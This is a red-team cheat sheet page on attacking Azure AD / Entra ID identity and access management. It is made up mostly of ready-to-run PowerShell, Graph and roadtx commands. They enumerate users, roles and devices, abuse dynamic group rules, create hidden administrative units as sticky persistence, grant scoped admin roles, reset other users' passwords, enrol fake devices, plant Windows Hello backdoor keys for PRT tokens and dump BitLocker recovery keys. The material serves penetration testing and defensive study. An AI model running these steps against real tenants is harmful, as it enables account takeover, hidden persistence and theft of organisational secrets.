azure-devices-users-sp.md (11376B)
1 --- 2 title: "Azure AD - IAM" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/azure/azure-devices-users-sp.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-devices-users-sp.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Azure AD - IAM 12 13 > Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource 14 15 * Users (User, Groups, Dynamic Groups) 16 * Devices 17 * Service Principals (Application and Managed Identities) 18 19 ## Users 20 21 * List users: `Get-AzureADUser -All $true` 22 * Enumerate groups 23 24 ```ps1 25 # List groups 26 Get-AzureADGroup -All $true 27 28 # Get members of a group 29 Get-AzADGroup -DisplayName '<GROUP-NAME>' 30 Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName 31 ``` 32 33 * Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember` 34 * List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName` 35 * Add user to a group 36 37 ```ps1 38 $groupid = "<group-id>" 39 $targetmember = "<user-id>" 40 $group = Get-MgGroup -GroupId $groupid 41 $members = Get-MgGroupMember -GroupId $groupid 42 New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember 43 ``` 44 45 ### Dynamic Group Membership 46 47 Get groups that allow Dynamic membership: 48 49 * Powershell Azure AD: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}` 50 * RoadRecon database: `select objectId, displayName, description, membershipRule, membershipRuleProcessingState, isMembershipRuleLocked from groups where membershipRule is not null;` 51 52 Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")` 53 Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group 54 55 1. Open user's profile, click on **Manage** 56 2. Click on **Resend** invite and to get an invitation URL 57 3. Set the secondary email 58 59 ```powershell 60 PS> Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT NAME>.onmicrosoft.com -Verbose 61 ``` 62 63 ### Administrative Unit 64 65 Enumerate Administrative Units. 66 67 ```ps1 68 PS AzureAD> Get-AzureADMSAdministrativeUnit -All $true 69 PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID> 70 PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID> 71 PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl 72 PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId> 73 PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl 74 ``` 75 76 Administrative Unit can be used as a persistence mechanism. When the `visibility` attribute is set to `HiddenMembership`, only members of the administrative unit can list other members of the administrative unit. 77 78 ```ps1 79 az rest \ 80 --method post \ 81 --url https://graph.microsoft.com/v1.0/directory/administrativeUnits \ 82 --body '{"displayName": "Hidden AU Administrative Unit", "isMemberManagementRestricted":false, "visibility": "HiddenMembership"}' 83 ``` 84 85 * Create a new Administrative Unit using the `New-MgDirectoryAdministrativeUnit` cmdlet. 86 87 ```ps1 88 Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All" 89 Import-Module Microsoft.Graph.Identity.DirectoryManagement 90 91 $params = @{ 92 displayName = "Marketing Department" 93 description = "Marketing Department Administration" 94 visibility = "HiddenMembership" 95 } 96 97 New-MgDirectoryAdministrativeUnit -BodyParameter $params 98 ``` 99 100 * Add a member with `New-MgDirectoryAdministrativeUnitMemberByRef` 101 102 ```ps1 103 Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All" 104 Import-Module Microsoft.Graph.Identity.DirectoryManagement 105 106 $administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f" 107 $paramsUser1 = @{ 108 "@odata.id" = "https://graph.microsoft.com/v1.0/users/52e26d18-d251-414f-af14-a4a93123b2b2" 109 } 110 New-MgDirectoryAdministrativeUnitMemberByRef -AdministrativeUnitId $administrativeUnitId -BodyParameter $paramsUser1 111 ``` 112 113 * List members even when the administrative unit is hidden. 114 115 ```ps1 116 Connect-MgGraph -Scopes "AdministrativeUnit.Read.All", "Member.Read.Hidden", "Directory.Read.All" 117 Import-Module Microsoft.Graph.Identity.DirectoryManagement 118 119 $administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f" 120 Get-MgDirectoryAdministrativeUnitMemberAsUser -AdministrativeUnitId $administrativeUnitId 121 ``` 122 123 * Assign the `User Administrator` role, its ID is `947ccf23-ee27-4951-8110-96c62c680311` in this tenant. 124 125 ```ps1 126 Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory" 127 Import-Module Microsoft.Graph.Identity.DirectoryManagement 128 129 $administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f" 130 $userAdministratorRoleId = "947ccf23-ee27-4951-8110-96c62c680311" 131 $params = @{ 132 roleId = $userAdministratorRoleId 133 roleMemberInfo = @{ 134 id = "61b0d52f-a902-4769-9a09-c6528336b00a" 135 } 136 } 137 138 New-MgDirectoryAdministrativeUnitScopedRoleMember -AdministrativeUnitId $administrativeUnitId -BodyParameter $params 139 ``` 140 141 * Now the user with the id `61b0d52f-a902-4769-9a09-c6528336b00a` can edit the property of the other users in the Administrative Units. 142 143 Administrative Units can reset password of another user. 144 145 ```powershell 146 PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force 147 PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose 148 ``` 149 150 ### Convert GUID to SID 151 152 The user's Entra ID is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the Entra ID. 153 154 ```powershell 155 GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] 156 SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] 157 ``` 158 159 For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` 160 161 ## Devices 162 163 ### List Devices 164 165 ```ps1 166 Connect-AzureAD 167 Get-AzureADDevice 168 $user = Get-AzureADUser -SearchString "username" 169 Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true 170 ``` 171 172 ### Device State 173 174 ```ps1 175 PS> dsregcmd.exe /status 176 +----------------------------------------------------------------------+ 177 | Device State | 178 +----------------------------------------------------------------------+ 179 AzureAdJoined : YES 180 EnterpriseJoined : NO 181 DomainJoined : NO 182 Device Name : jumpvm 183 ``` 184 185 * [**Azure AD Joined**](https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large) 186 * [**Workplace Joined**](https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large) 187 * [**Hybrid Joined**](https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large) 188 * [**Workplace joined on AADJ or Hybrid**](https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large) 189 190 ### Join Devices 191 192 [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device) 193 194 * [secureworks/pytune](https://github.com/secureworks/pytune) - Pytune is a post-exploitation tool for enrolling a fake device into Intune with mulitple platform support. 195 196 ```ps1 197 usage: pytune.py [-h] {entra_join,entra_delete,enroll_intune,checkin,retire_intune,check_compliant,download_apps} ... 198 199 python3 pytune.py entra_join -o Windows -d Windows_pytune -u testuser@*******.onmicrosoft.com -p *********** 200 python3 pytune.py enroll_intune -o Windows -d Windows_pytune -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p *********** 201 python3 pytune.py checkin -o Windows -d Windows_pytune -c Windows_pytune.pfx -m Windows_pytune_mdm.pfx -u testuser@*******.onmicrosoft.com -p *********** 202 python3 pytune.py check_compliant -o Windows -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p *********** 203 python3 pytune.py check_compliant -o Windows -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p *********** -H $HWHASH 204 ``` 205 206 ### Register Devices 207 208 ```ps1 209 roadtx device -a register -n swkdeviceup 210 ``` 211 212 ### Windows Hello for Business 213 214 ```ps1 215 roadtx.exe prtenrich --ngcmfa-drs-auth 216 roadtx.exe winhello -k swkdevicebackdoor.key 217 roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key 218 roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com 219 ``` 220 221 ### Bitlocker Keys 222 223 ```ps1 224 Install-Module Microsoft.Graph -Scope CurrentUser 225 Import-Module Microsoft.Graph.Identity.SignIns 226 Connect-MgGraph -Scopes BitLockerKey.Read.All 227 Get-MgInformationProtectionBitlockerRecoveryKey -All 228 Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId 229 ``` 230 231 ## Service Principals 232 233 ```ps1 234 PS C:\> Get-AzureADServicePrincipal 235 236 ObjectId AppId DisplayName 237 -------- ----- ----------- 238 00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App 239 012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise 240 06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement 241 092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports 242 0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS 243 0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService 244 0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service 245 0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics</dev:code> 246 ``` 247 248 ## Other 249 250 Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph: 251 252 ```ps1 253 roadtx getscope -s https://graph.microsoft.com/mail.read 254 roadtx findscope -s https://graph.microsoft.com/mail.read 255 ``` 256 257 ## References 258 259 * [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps) 260 * [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) 261 * [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) 262 * [AZURE AD INTRODUCTION FOR RED TEAMERS - Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) 263 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab) 264 * [Hidden in Plain Sight: Abusing Entra ID Administrative Units for Sticky Persistence - Katie Knowles - September 16, 2024](https://securitylabs.datadoghq.com/articles/abusing-entra-id-administrative-units/) 265 * [Create Sticky Backdoor User Through Restricted Management AU - Datadog, Inc](https://stratus-red-team.cloud/attack-techniques/entra-id/entra-id.persistence.restricted-au/) 266 * [Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise - Yuya Chudo - December 11, 2024](https://i.blackhat.com/EU-24/Presentations/EU-24-Chudo-Unveiling-the-Power-of-Intune-Leveraging-Intune-for-Breaking-Into-Your-Cloud-and-On-Premise.pdf)